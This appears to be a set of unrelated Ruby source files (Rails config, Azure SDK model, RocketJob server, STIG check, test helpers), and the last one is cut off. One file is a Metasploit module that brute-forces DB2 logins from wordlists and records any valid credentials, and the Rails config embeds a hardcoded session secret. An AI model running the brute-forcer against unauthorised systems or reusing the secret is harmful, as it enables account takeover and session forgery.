$LOAD_PATH.unshift(File.dirname(__FILE__)) $LOAD_PATH.unshift(File.join(File.dirname(__FILE__), '..', 'lib')) MODELS = File.join(File.dirname(__FILE__), 'models') require 'rubygems' require 'mongoid' require 'mongoid_auto_increment' require 'database_cleaner' require 'simplecov' SimpleCov.start Dir["#{MODELS}/*.rb"].each { |f| require f } if defined?(::Mongoid::VERSION) && ::Mongoid::VERSION > '3' Mongoid.configure do |config| config.connect_to 'mongoid_auto_increment_test' end else Mongoid.config.master = Mongo::Connection.new.db('mongoid_auto_increment_test') end Mongoid.logger = Logger.new($stdout) DatabaseCleaner.orm = 'mongoid' RSpec.configure do |config| config.before(:all) do DatabaseCleaner.strategy = :truncation end config.before(:each) do DatabaseCleaner.start end config.after(:each) do DatabaseCleaner.clean end end
# Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::Network::Mgmt::V2019_06_01 module Models # # A network interface in a resource group. # class NetworkInterface < Resource include MsRestAzure # @return [SubResource] The reference of a virtual machine. attr_accessor :virtual_machine # @return [NetworkSecurityGroup] The reference of the # NetworkSecurityGroup resource. attr_accessor :network_security_group # @return [PrivateEndpoint] A reference to the private endpoint to which # the network interface is linked. attr_accessor :private_endpoint # @return [Array<NetworkInterfaceIPConfiguration>] A list of # IPConfigurations of the network interface. attr_accessor :ip_configurations # @return [Array<NetworkInterfaceTapConfiguration>] A list of # TapConfigurations of the network interface. attr_accessor :tap_configurations # @return [NetworkInterfaceDnsSettings] The DNS settings in network # interface. attr_accessor :dns_settings # @return [String] The MAC address of the network interface. attr_accessor :mac_address # @return [Boolean] Gets whether this is a primary network interface on a # virtual machine. attr_accessor :primary # @return [Boolean] If the network interface is accelerated networking # enabled. attr_accessor :enable_accelerated_networking # @return [Boolean] Indicates whether IP forwarding is enabled on this # network interface. attr_accessor :enable_ipforwarding # @return [Array<String>] A list of references to linked BareMetal # resources. attr_accessor :hosted_workloads # @return [String] The resource GUID property of the network interface # resource. attr_accessor :resource_guid # @return [String] The provisioning state of the public IP resource. # Possible values are: 'Updating', 'Deleting', and 'Failed'. attr_accessor :provisioning_state # @return [String] A unique read-only string that changes whenever the # resource is updated. attr_accessor :etag # # Mapper for NetworkInterface class as Ruby Hash. # This will be used for serialization/deserialization. # def self.mapper() { client_side_validation: true, required: false, serialized_name: 'NetworkInterface', type: { name: 'Composite', class_name: 'NetworkInterface', model_properties: { id: { client_side_validation: true, required: false, serialized_name: 'id', type: { name: 'String' } }, name: { client_side_validation: true, required: false, read_only: true, serialized_name: 'name', type: { name: 'String' } }, type: { client_side_validation: true, required: false, read_only: true, serialized_name: 'type', type: { name: 'String' } }, location: { client_side_validation: true, required: false, serialized_name: 'location', type: { name: 'String' } }, tags: { client_side_validation: true, required: false, serialized_name: 'tags', type: { name: 'Dictionary', value: { client_side_validation: true, required: false, serialized_name: 'StringElementType', type: { name: 'String' } } } }, virtual_machine: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.virtualMachine', type: { name: 'Composite', class_name: 'SubResource' } }, network_security_group: { client_side_validation: true, required: false, serialized_name: 'properties.networkSecurityGroup', type: { name: 'Composite', class_name: 'NetworkSecurityGroup' } }, private_endpoint: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.privateEndpoint', type: { name: 'Composite', class_name: 'PrivateEndpoint' } }, ip_configurations: { client_side_validation: true, required: false, serialized_name: 'properties.ipConfigurations', type: { name: 'Sequence', element: { client_side_validation: true, required: false, serialized_name: 'NetworkInterfaceIPConfigurationElementType', type: { name: 'Composite', class_name: 'NetworkInterfaceIPConfiguration' } } } }, tap_configurations: { client_side_validation: true, required: false, serialized_name: 'properties.tapConfigurations', type: { name: 'Sequence', element: { client_side_validation: true, required: false, serialized_name: 'NetworkInterfaceTapConfigurationElementType', type: { name: 'Composite', class_name: 'NetworkInterfaceTapConfiguration' } } } }, dns_settings: { client_side_validation: true, required: false, serialized_name: 'properties.dnsSettings', type: { name: 'Composite', class_name: 'NetworkInterfaceDnsSettings' } }, mac_address: { client_side_validation: true, required: false, serialized_name: 'properties.macAddress', type: { name: 'String' } }, primary: { client_side_validation: true, required: false, serialized_name: 'properties.primary', type: { name: 'Boolean' } }, enable_accelerated_networking: { client_side_validation: true, required: false, serialized_name: 'properties.enableAcceleratedNetworking', type: { name: 'Boolean' } }, enable_ipforwarding: { client_side_validation: true, required: false, serialized_name: 'properties.enableIPForwarding', type: { name: 'Boolean' } }, hosted_workloads: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.hostedWorkloads', type: { name: 'Sequence', element: { client_side_validation: true, required: false, serialized_name: 'StringElementType', type: { name: 'String' } } } }, resource_guid: { client_side_validation: true, required: false, serialized_name: 'properties.resourceGuid', type: { name: 'String' } }, provisioning_state: { client_side_validation: true, required: false, serialized_name: 'properties.provisioningState', type: { name: 'String' } }, etag: { client_side_validation: true, required: false, serialized_name: 'etag', type: { name: 'String' } } } } } end end end end
# Be sure to restart your server when you modify this file # Uncomment below to force Rails into production mode when # you don't control web/app server and can't set it the proper way # ENV['RAILS_ENV'] ||= 'production' # Specifies gem version of Rails to use when vendor/rails is not present RAILS_GEM_VERSION = '2.3.5' unless defined? RAILS_GEM_VERSION # Bootstrap the Rails environment, frameworks, and default configuration require File.join(File.dirname(__FILE__), 'boot') Rails::Initializer.run do |config| # Settings in config/environments/* take precedence over those specified here. # Application configuration should go into files in config/initializers # -- all .rb files in that directory are automatically loaded. # See Rails::Configuration for more options. # Skip frameworks you're not going to use. To use Rails without a database # you must remove the Active Record framework. # config.frameworks -= [ :active_record, :active_resource, :action_mailer ] # Specify gems that this application depends on. # They can then be installed with "rake gems:install" on new installations. # config.gem "bj" # config.gem "hpricot", :version => '0.6', :source => "http://code.whytheluckystiff.net" # config.gem "aws-s3", :lib => "aws/s3" config.gem "coderay" config.gem "RedCloth" # Only load the plugins named here, in the order given. By default, all plugins # in vendor/plugins are loaded in alphabetical order. # :all can be used as a placeholder for all plugins not explicitly named # config.plugins = [ :exception_notification, :ssl_requirement, :all ] # Add additional load paths for your own custom dirs # config.load_paths += %W( #{RAILS_ROOT}/extras ) # Force all environments to use the same logger level # (by default production uses :info, the others :debug) # config.log_level = :debug # Make Time.zone default to the specified zone, and make Active Record store time values # in the database in UTC, and return them converted to the specified local zone. # Run "rake -D time" for a list of tasks for finding time zone names. Uncomment to use default local time. config.time_zone = 'UTC' # Your secret key for verifying cookie session data integrity. # If you change this key, all old sessions will become invalid! # Make sure the secret is at least 30 characters and all random, # no regular words or you'll be exposed to dictionary attacks. config.action_controller.session = { :session_key => '_blog_session', :secret => 'f3f57b71ef9345ffccd0c4e841d8e74bb2e7d2ef692a5303bb455fea0667a62d30458d17f95766b12906aa6c2a3c29d584a55dd18426ffc04610be49956a51af' } # Use the database for sessions instead of the cookie-based default, # which shouldn't be used to store highly confidential information # (create the session table with "rake db:sessions:create") # config.action_controller.session_store = :active_record_store # Use SQL instead of Active Record's schema dumper when creating the test database. # This is necessary if your schema can't be completely dumped by the schema dumper, # like if you have constraints or database-specific column types # config.active_record.schema_format = :sql # Activate observers that should always be running # config.active_record.observers = :cacher, :garbage_collector end
# Monkey patching patterns lifted from # https://github.com/thoughtbot/airbrake/blob/master/lib/airbrake/rake_handler.rb module ExceptionNotifier module RakePatch def display_error_message(ex) super(ex) ExceptionNotifier::Rake.maybe_deliver_notification(ex, :rake_command_line => reconstruct_command_line) end def reconstruct_command_line "rake #{ARGV.join(' ')}" end end end # Only do this if we're actually in a Rake context. In some contexts (e.g., # in the Rails console) Rake might not be defined. if Object.const_defined?(:Rake) && Rake.respond_to?(:application) Rake.application.instance_eval do class << self prepend ExceptionNotifier::RakePatch end end end
## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::DB2 include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report def initialize super( 'Name' => 'DB2 Authentication Brute Force Utility', 'Version' => '$Revision$', 'Description' => %q{This module attempts to authenticate against a DB2 instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.}, 'Author' => ['todb'], 'References' => [ [ 'CVE', '1999-0502'] # Weak password ], 'License' => MSF_LICENSE ) register_options( [ OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line", File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_userpass.txt") ]), OptPath.new('USER_FILE', [ false, "File containing users, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_user.txt") ]), OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "db2_default_pass.txt") ]), ], self.class) end def run_host(ip) each_user_pass { |user, pass| do_login(user,pass,datastore['DATABASE']) } end def do_login(user=nil,pass=nil,db=nil) datastore['USERNAME'] = user datastore['PASSWORD'] = pass vprint_status("#{rhost}:#{rport} - DB2 - Trying username:'#{user}' with password:'#{pass}'") begin info = db2_check_login rescue ::Rex::ConnectionError vprint_error("#{rhost}:#{rport} : Unable to attempt authentication") return :abort rescue ::Rex::Proto::DRDA::RespError => e vprint_error("#{rhost}:#{rport} : Error in connecting to DB2 instance: #{e}") return :abort end disconnect if info[:db_login_success] print_good("#{rhost}:#{rport} - DB2 - successful login for '#{user}' : '#{pass}' against database '#{db}'") # Report credentials report_auth_info( :host => rhost, :port => rport, :sname => "db2", :user => "#{db}/#{user}", :pass => pass, :active => true ) return :next_user else vprint_error("#{rhost}:#{rport} - DB2 - failed login for '#{user}' : '#{pass}' against database '#{db}'") return :fail end end end
# Generated by the protocol buffer compiler. DO NOT EDIT! # source: hook.proto require 'google/protobuf' require 'lint_pb' require 'shared_pb' Google::Protobuf::DescriptorPool.generated_pool.build do add_file("hook.proto", :syntax => :proto3) do add_message "gitaly.PreReceiveHookRequest" do optional :repository, :message, 1, "gitaly.Repository" repeated :environment_variables, :string, 2 optional :stdin, :bytes, 4 repeated :git_push_options, :string, 5 end add_message "gitaly.PreReceiveHookResponse" do optional :stdout, :bytes, 1 optional :stderr, :bytes, 2 optional :exit_status, :message, 3, "gitaly.ExitStatus" end add_message "gitaly.PostReceiveHookRequest" do optional :repository, :message, 1, "gitaly.Repository" repeated :environment_variables, :string, 2 optional :stdin, :bytes, 3 repeated :git_push_options, :string, 4 end add_message "gitaly.PostReceiveHookResponse" do optional :stdout, :bytes, 1 optional :stderr, :bytes, 2 optional :exit_status, :message, 3, "gitaly.ExitStatus" end add_message "gitaly.UpdateHookRequest" do optional :repository, :message, 1, "gitaly.Repository" repeated :environment_variables, :string, 2 optional :ref, :bytes, 3 optional :old_value, :string, 4 optional :new_value, :string, 5 end add_message "gitaly.UpdateHookResponse" do optional :stdout, :bytes, 1 optional :stderr, :bytes, 2 optional :exit_status, :message, 3, "gitaly.ExitStatus" end add_message "gitaly.ReferenceTransactionHookRequest" do optional :repository, :message, 1, "gitaly.Repository" repeated :environment_variables, :string, 2 optional :stdin, :bytes, 3 optional :state, :enum, 4, "gitaly.ReferenceTransactionHookRequest.State" end add_enum "gitaly.ReferenceTransactionHookRequest.State" do value :PREPARED, 0 value :COMMITTED, 1 value :ABORTED, 2 end add_message "gitaly.ReferenceTransactionHookResponse" do optional :stdout, :bytes, 1 optional :stderr, :bytes, 2 optional :exit_status, :message, 3, "gitaly.ExitStatus" end add_message "gitaly.PackObjectsHookRequest" do optional :repository, :message, 1, "gitaly.Repository" repeated :args, :string, 2 optional :stdin, :bytes, 3 end add_message "gitaly.PackObjectsHookResponse" do optional :stdout, :bytes, 1 optional :stderr, :bytes, 2 end add_message "gitaly.PackObjectsHookWithSidechannelRequest" do optional :repository, :message, 1, "gitaly.Repository" repeated :args, :string, 2 end add_message "gitaly.PackObjectsHookWithSidechannelResponse" do end end end module Gitaly PreReceiveHookRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("gitaly.PreReceiveHookRequest").msgclass PreReceiveHookResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("gitaly.PreReceiveHookResponse").msgclass PostReceiveHookRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("gitaly.PostReceiveHookRequest").msgclass PostReceiveHookResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("gitaly.PostReceiveHookResponse").msgclass UpdateHookRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("gitaly.UpdateHookRequest").msgclass UpdateHookResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("gitaly.UpdateHookResponse").msgclass ReferenceTransactionHookRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("gitaly.ReferenceTransactionHookRequest").msgclass ReferenceTransactionHookRequest::State = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("gitaly.ReferenceTransactionHookRequest.State").enummodule ReferenceTransactionHookResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("gitaly.ReferenceTransactionHookResponse").msgclass PackObjectsHookRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("gitaly.PackObjectsHookRequest").msgclass PackObjectsHookResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("gitaly.PackObjectsHookResponse").msgclass PackObjectsHookWithSidechannelRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("gitaly.PackObjectsHookWithSidechannelRequest").msgclass PackObjectsHookWithSidechannelResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("gitaly.PackObjectsHookWithSidechannelResponse").msgclass end
module YmCore::Generators module Migration def self.included(base) base.send(:include, Rails::Generators::Migration) base.extend(ClassMethods) end module ClassMethods def next_migration_number(path) unless @prev_migration_nr @prev_migration_nr = Time.now.utc.strftime("%Y%m%d%H%M%S").to_i else @prev_migration_nr += 1 end @prev_migration_nr.to_s end end private def try_migration_template(source, destination) begin migration_template source, destination rescue Rails::Generators::Error => e puts e end end end end
require 'concurrent' module RocketJob # Server # # On startup a server instance will automatically register itself # if not already present # # Starting a server in the foreground: # - Using a Rails runner: # bin/rocketjob # # Starting a server in the background: # - Using a Rails runner: # nohup bin/rocketjob --quiet 2>&1 1>output.log & # # Stopping a server: # - Stop the server via the Web UI # - Send a regular kill signal to make it shutdown once all active work is complete # kill <pid> # - Or, use the following Ruby code: # server = RocketJob::Server.where(name: 'server name').first # server.stop! # # Sending the kill signal locally will result in starting the shutdown process # immediately. Via the UI or Ruby code the server can take up to 15 seconds # (the heartbeat interval) to start shutting down. class Server include Plugins::Document include Plugins::StateMachine include SemanticLogger::Loggable store_in collection: 'rocket_job.servers' # Unique Name of this server instance # Default: `host name:PID` # The unique name is used on re-start to re-queue any jobs that were being processed # at the time the server unexpectedly terminated, if any field :name, type: String, default: -> { "#{SemanticLogger.host}:#{$$}" } # The maximum number of workers this server should start # If set, it will override the default value in RocketJob::Config field :max_workers, type: Integer, default: -> { Config.instance.max_workers } # When this server process was started field :started_at, type: Time # Filter to apply to control which job classes this server can process field :filter, type: Hash # The heartbeat information for this server embeds_one :heartbeat, class_name: 'RocketJob::Heartbeat' # Current state # Internal use only. Do not set this field directly field :state, type: Symbol, default: :starting index({name: 1}, background: true, unique: true, drop_dups: true) validates_presence_of :state, :name, :max_workers # States # :starting -> :running -> :paused # -> :stopping aasm column: :state, whiny_persistence: true do state :starting, initial: true state :running state :paused state :stopping event :started do transitions from: :starting, to: :running before do self.started_at = Time.now end end event :pause do transitions from: :running, to: :paused end event :resume do transitions from: :paused, to: :running end event :stop do transitions from: :running, to: :stopping transitions from: :paused, to: :stopping transitions from: :starting, to: :stopping end end # Requeue any jobs being worked by this server when it is destroyed before_destroy :requeue_jobs # Destroy's all instances of zombie servers and requeues any jobs still "running" # on those servers. def self.destroy_zombies count = 0 each do |server| next unless server.zombie? logger.warn "Destroying zombie server #{server.name}, and requeueing its jobs" server.destroy count += 1 end count end # Stop all running, paused, or starting servers def self.stop_all where(:state.in => [:running, :paused, :starting]).each(&:stop!) end # Pause all running servers def self.pause_all running.each(&:pause!) end # Resume all paused servers def self.resume_all paused.each(&:resume!) end # Returns [Hash<String:Integer>] of the number of servers in each state. # Note: If there are no servers in that particular state then the hash will not have a value for it. # # Example servers in every state: # RocketJob::Server.counts_by_state # # => { # :aborted => 1, # :completed => 37, # :failed => 1, # :paused => 3, # :queued => 4, # :running => 1, # :queued_now => 1, # :scheduled => 3 # } # # Example no servers active: # RocketJob::Server.counts_by_state # # => {} def self.counts_by_state counts = {} collection.aggregate( [ { '$group' => { _id: '$state', count: {'$sum' => 1} } } ] ).each do |result| counts[result['_id'].to_sym] = result['count'] end counts end # On MRI the 'concurrent-ruby-ext' gem may not be loaded if defined?(Concurrent::JavaAtomicBoolean) || defined?(Concurrent::CAtomicBoolean) # Returns [true|false] whether the shutdown indicator has been set for this server process def self.shutdown? @shutdown.value end # Set shutdown indicator for this server process def self.shutdown! @shutdown.make_true end @shutdown = Concurrent::AtomicBoolean.new(false) else # Returns [true|false] whether the shutdown indicator has been set for this server process def self.shutdown? @shutdown end # Set shutdown indicator for this server process def self.shutdown! @shutdown = true end @shutdown = false end # Run the server process # Attributes supplied are passed to #new def self.run(attrs = {}) Thread.current.name = 'rocketjob main' # Create Indexes on server startup Mongoid::Tasks::Database.create_indexes register_signal_handlers server = create!(attrs) server.send(:run) ensure server.destroy if server end # Returns [Boolean] whether the server is shutting down def shutdown? self.class.shutdown? || !running? end # Scope for all zombie servers def self.zombies(missed = 4) dead_seconds = Config.instance.heartbeat_seconds * missed last_heartbeat_time = Time.now - dead_seconds where( :state.in => [:stopping, :running, :paused], '$or' => [ {"heartbeat.updated_at" => {'$exists' => false}}, {"heartbeat.updated_at" => {'$lte' => last_heartbeat_time}} ] ) end # Returns [true|false] if this server has missed at least the last 4 heartbeats # # Possible causes for a server to miss its heartbeats: # - The server process has died # - The server process is "hanging" # - The server is no longer able to communicate with the MongoDB Server def zombie?(missed = 4) return false unless running? || stopping? || paused? return true if heartbeat.nil? || heartbeat.updated_at.nil? dead_seconds = Config.instance.heartbeat_seconds * missed (Time.now - heartbeat.updated_at) >= dead_seconds end private attr_reader :workers # Returns [Array<Worker>] collection of workers def workers @workers ||= [] end # Management Thread def run logger.info "Using MongoDB Database: #{RocketJob::Job.collection.database.name}" build_heartbeat(updated_at: Time.now, workers: 0) started! logger.info 'RocketJob Server started' run_workers logger.info 'Waiting for workers to stop' # Tell each worker to shutdown cleanly workers.each(&:shutdown!) while worker = workers.first if worker.join(5) # Worker thread is dead workers.shift else # Timeout waiting for worker to stop find_and_update( 'heartbeat.updated_at' => Time.now, 'heartbeat.workers' => worker_count ) end end logger.info 'Shutdown' rescue Mongoid::Errors::DocumentNotFound logger.warn('Server has been destroyed. Going down hard!') rescue Exception => exc logger.error('RocketJob::Server is stopping due to an exception', exc) ensure # Logs the backtrace for each running worker if SemanticLogger::VERSION.to_i >= 4 workers.each { |worker| logger.backtrace(thread: worker.thread) if worker.thread && worker.alive? } end end def run_workers stagger = true while running? || paused? SemanticLogger.silence(:info) do find_and_update( 'heartbeat.updated_at' => Time.now, 'heartbeat.workers' => worker_count ) end if paused? workers.each(&:shutdown!) stagger = true end # In case number of threads has been modified adjust_workers(stagger) stagger = false # Stop server if shutdown indicator was set if self.class.shutdown? && may_stop? stop! else sleep Config.instance.heartbeat_seconds end end end # Returns [Fixnum] number of workers (threads) that are alive def worker_count workers.count(&:alive?) end def next_worker_id @worker_id ||= 0 @worker_id += 1 end # Re-adjust the number of running workers to get it up to the # required number of workers # Parameters # stagger_workers # Whether to stagger when the workers poll for work the first time # It spreads out the queue polling over the max_poll_seconds so # that not all workers poll at the same time # The worker also respond faster than max_poll_seconds when a new # job is added. def adjust_workers(stagger_workers = false) count = worker_count # Cleanup workers that have stopped if count != workers.count logger.info "Cleaning up #{workers.count - count} workers that went away" workers.delete_if { |t| !t.alive? } end return unless running? # Need to add more workers? if count < max_workers worker_count = max_workers - count logger.info "Starting #{worker_count} workers" worker_count.times.each do sleep (Config.instance.max_poll_seconds.to_f / max_workers) if stagger_workers return if shutdown? # Start worker begin workers << Worker.new(id: next_worker_id, server_name: name, filter: filter) rescue Exception => exc logger.fatal('Cannot start worker', exc) end end end end # Register handlers for the various signals # Term: # Perform clean shutdown # def self.register_signal_handlers begin Signal.trap 'SIGTERM' do shutdown! message = 'Shutdown signal (SIGTERM) received. Will shutdown as soon as active jobs/slices have completed.' # Logging uses a mutex to access Queue on MRI/CRuby defined?(JRuby) ? logger.warn(message) : puts(message) end Signal.trap 'INT' do shutdown! message = 'Shutdown signal (INT) received. Will shutdown as soon as active jobs/slices have completed.' # Logging uses a mutex to access Queue on MRI/CRuby defined?(JRuby) ? logger.warn(message) : puts(message) end rescue StandardError logger.warn 'SIGTERM handler not installed. Not able to shutdown gracefully' end end # Requeue any jobs assigned to this server when it is destroyed def requeue_jobs RocketJob::Job.requeue_dead_server(name) end end end
# frozen_string_literal: true module Justdi # Store of entities definitions class DefinitionStore class << self # Class for stores generation # @return [Class<Hash>] def general_store @general_store ||= Hash end # Class for register handlers generation # @return [Class<Justdi::RegisterHandler>] def register_handler @register_handler ||= Justdi::RegisterHandler end protected attr_writer :general_store, :register_handler alias use_general_store general_store= alias use_register_handler register_handler= end # Register definition declaration # # @example Register a static value # "container.register(:example).use_value(42)" # # @param token [String, Symbol, Numeric, Class] # @return [Justdi::RegisterHandler] def register(token) self.class.register_handler.new { |value| store[token] = value } end # Register any dependency declaration manually # # @param token [String, Symbol, Numeric, Class] # @param definition [Hash] # @option definition [Symbol] :type # @option definition [*] :value def set(token, **definition) store[token] = Justdi::Definition.new(**definition) end # Short definition syntax # @param token [String, Symbol, Numeric, Class] # @param definition [Hash] def []=(token, definition) set(token, **definition) end # Check existence of dependency # @return [Boolean] def has?(token) store.key? token end # Store is empty # @return [Boolean] def empty? store.empty? end # Load dependency # # @param token [String, Symbol, Numeric, Class] # @return [*] def get(token) store[token] end # Short getting syntax # @param token [String, Symbol, Numeric, Class] # @return [*] def [](token) get(token) end # Merge definition stores # # @param def_store [DefinitionStore] def merge(def_store) @store = store.merge def_store.all end # Return all definitions # @return [Hash] def all store.clone.freeze end # Iterates over existing values # # @yield [token, definition] def each store.each { |(key, value)| yield key, value } end protected # Definition store # @return [Hash] def store @store ||= self.class.general_store.new end end end
require 'active_record' require 'logger' ActiveRecord::Base.establish_connection ActiveRecord::Base.logger = Logger.new(SPEC_ROOT.join('debug.log')) ActiveRecord::Migration.verbose = false ActiveRecord::Schema.define do create_table :users, :force => true do |t| t.column :name, :string t.column :username, :string t.column :password, :string t.column :activated, :boolean t.column :suspended_at, :datetime t.column :logins, :integer, :default => 0 t.column :created_at, :datetime t.column :updated_at, :datetime end create_table :companies, :force => true do |t| t.column :name, :string t.column :owner_id, :integer t.column :type, :string end create_table :authors, :force => true do |t| t.column :name, :string end create_table :books, :force => true do |t| t.column :authord_id, :integer t.column :title, :string end create_table :audits, :force => true do |t| t.column :auditable_id, :integer t.column :auditable_type, :string t.column :associated_id, :integer t.column :associated_type, :string t.column :user_id, :integer t.column :user_type, :string t.column :username, :string t.column :action, :string t.column :audited_changes, :text t.column :version, :integer, :default => 0 t.column :comment, :string t.column :remote_address, :string t.column :request_uuid, :string t.column :created_at, :datetime end add_index :audits, [:auditable_id, :auditable_type], :name => 'auditable_index' add_index :audits, [:associated_id, :associated_type], :name => 'associated_index' add_index :audits, [:user_id, :user_type], :name => 'user_index' add_index :audits, :request_uuid add_index :audits, :created_at end
# frozen_string_literal: true require 'pathname' # Encapsulates app configuration module App class << self def env ENV['RACK_ENV'] || 'development' end def root Pathname.new(File.expand_path('..', __dir__)) end end end
require 'spec_helper' RSpec.describe EmailAddressee do it { should validate_presence_of(:email) } it { should validate_presence_of(:addressee) } it { should validate_presence_of(:email_type) } it { should belong_to(:email) } it { should belong_to(:addressee) } end
require 'grape_skeleton/settings' module GrapeSkeleton module Config def self.app_name @app_name ||= GrapeSkeleton::Settings.application_name end def self.to_h { app_name: app_name, version: GrapeSkeleton::VERSION, } end end end
class Doublecommand < Cask version '1.7' sha256 '312aaf1a60517c694b24131bf502945dc23a22c917971c3e7a3adca163560503' url 'http://doublecommand.sourceforge.net/files/DoubleCommand-1.7.dmg' homepage 'http://doublecommand.sourceforge.net' pkg 'DoubleCommand-1.7.pkg' uninstall :script => '/Library/StartupItems/DoubleCommand/uninstall.command' end
# encoding: utf-8 require 'libis/workflow/mongoid' module Libis module Ingester class AccessRight include ::Libis::Workflow::Mongoid::Base store_in collection: 'access_rights' field :name, type: String field :ar_id, type: String index({name: 1}, {unique: true, name: 'by_name'}) end end end
require 'codeclimate-test-reporter' CodeClimate::TestReporter.start require 'twofishes' require 'minitest/autorun' require 'minitest/unit' require 'minitest/pride' require 'mocha/mini_test' module MiniTest class Test def mock_thrift_client thrift_client = mock Twofishes::Client.expects(:thrift_client).returns(thrift_client) thrift_client end def mock_geocode(response) mock_thrift_client.expects(:geocode).returns(response) end def mock_reverse_geocode(response) mock_thrift_client.expects(:reverseGeocode).returns(response) end end end
# encoding: UTF-8 control 'VCRP-70-000002' do title 'Envoy must set a limit on established connections.' desc "Envoy client connections must be limited in order to preserve system resources and to continue servicing connections without interruption. Without a limit, set the system would be vulnerable to a trivial denial of service attack where connections are created en masse and vCenter resources are entirely consumed. Envoy comes hard coded with a tested and supported value for \"maxHttpsConnections\" that must be verified and maintained. " desc 'rationale', '' desc 'check', " At the command prompt, execute the following command: # xmllint --xpath '/config/envoy/L4Filter/maxHttpsConnections/text()' /etc/vmware-rhttpproxy/config.xml Expected result: 2048 or XPath set is empty If the output does not match the expected result, this is a finding. " desc 'fix', " Navigate to and open /etc/vmware-rhttpproxy/config.xml Locate the <config>/<envoy>/<L4Filter> block and configure <maxHttpsConnections> as follows: <maxHttpsConnections>2048</maxHttpsConnections> Restart the service for changes to take effect. # vmon-cli --restart rhttpproxy " impact 0.5 tag severity: 'medium' tag gtitle: 'SRG-APP-000001-WSR-000001' tag gid: nil tag rid: nil tag stig_id: 'VCRP-70-000002' tag fix_id: nil tag cci: 'CCI-000054' tag nist: ['AC-10'] describe.one do describe xml("#{input('configXmlPath')}") do its(['/config/envoy/L4Filter/maxHttpsConnections']) { should cmp "#{input('maxHttpsConnections')}" } end describe xml("#{input('configXmlPath')}") do its(['/config/envoy/L4Filter/maxHttpsConnections']) { should cmp [] } end end end
#-- copyright # OpenProject is a project management system. # Copyright (C) 2012-2017 the OpenProject Foundation (OPF) # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License version 3. # # OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows: # Copyright (C) 2006-2017 Jean-Philippe Lang # Copyright (C) 2010-2013 the ChiliProject Team # # This program is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. # # See doc/COPYRIGHT.rdoc for more details. #++ require 'support/pages/page' module Pages class AbstractWorkPackage < Page attr_reader :project, :work_package, :type_field_selector, :subject_field_selector def initialize(work_package, project = nil) @work_package = work_package @project = project @type_field_selector = '.wp-edit-field.type' @subject_field_selector = '.wp-edit-field.subject' end def visit_tab!(tab) visit path(tab) end def expect_tab(tab) expect(page).to have_selector('.tabrow li.selected', text: tab.to_s.upcase) end def edit_field(attribute, context) WorkPackageField.new(context, attribute) end def expect_hidden_field(attribute) page.within(container) do expect(page).to have_no_selector(".inplace-edit.#{attribute}") end end def expect_subject page.within(container) do expect(page).to have_content(work_package.subject) end end def open_in_split_view find('#work-packages-details-view-button').click end def ensure_page_loaded expect(page).to have_selector('.work-package-details-activities-activity-contents .user', text: work_package.journals.last.user.name, minimum: 1, wait: 10) end def expect_group(name, &block) expect(page).to have_selector('.attributes-group--header-text', text: name.upcase) if block_given? page.within(".attributes-group[data-group-name='#{name}']", &block) end end def expect_no_group(name) expect(page).to have_no_selector('.attributes-group--header-text', text: name.upcase) end def expect_attributes(attribute_expectations) attribute_expectations.each do |label_name, value| label = label_name.to_s if label == 'status' expect(page).to have_selector(".wp-status-button .button", text: value) else expect(page).to have_selector(".wp-edit-field.#{label.camelize(:lower)}", text: value) end end end def expect_attribute_hidden(label) expect(page).not_to have_selector(".wp-edit-field.#{label.downcase}") end def expect_activity(user, number: nil) container = '#work-package-activites-container' container += " #activity-#{number}" if number expect(page).to have_selector(container + ' .user', text: user.name) end def expect_activity_message(message) expect(page).to have_selector('.work-package-details-activities-messages .message', text: message) end def expect_parent(parent = nil) parent ||= work_package.parent expect(parent).to_not be_nil visit_tab!('relations') expect(page).to have_selector('.relation-row a', text: "#{parent.type.name}: #{parent.subject}") end def expect_zen_mode expect(page).to have_selector('#main-menu', visible: false) expect(page).to have_selector('#top-menu', visible: false) end def expect_no_zen_mode expect(page).to have_selector('#main-menu', visible: true) expect(page).to have_selector('#top-menu', visible: true) end def update_attributes(key_value_map, save: true) set_attributes(key_value_map, save: save) end def set_attributes(key_value_map, save: true) key_value_map.each_with_index.map do |(key, value), index| field = work_package_field(key) field.update(value, save: save) unless index == key_value_map.length - 1 ensure_no_conflicting_modifications end end end def work_package_field(key) if key =~ /customField(\d+)$/ cf = CustomField.find $1 if cf.field_format == 'text' WorkPackageTextAreaField.new page, key else WorkPackageField.new page, key end 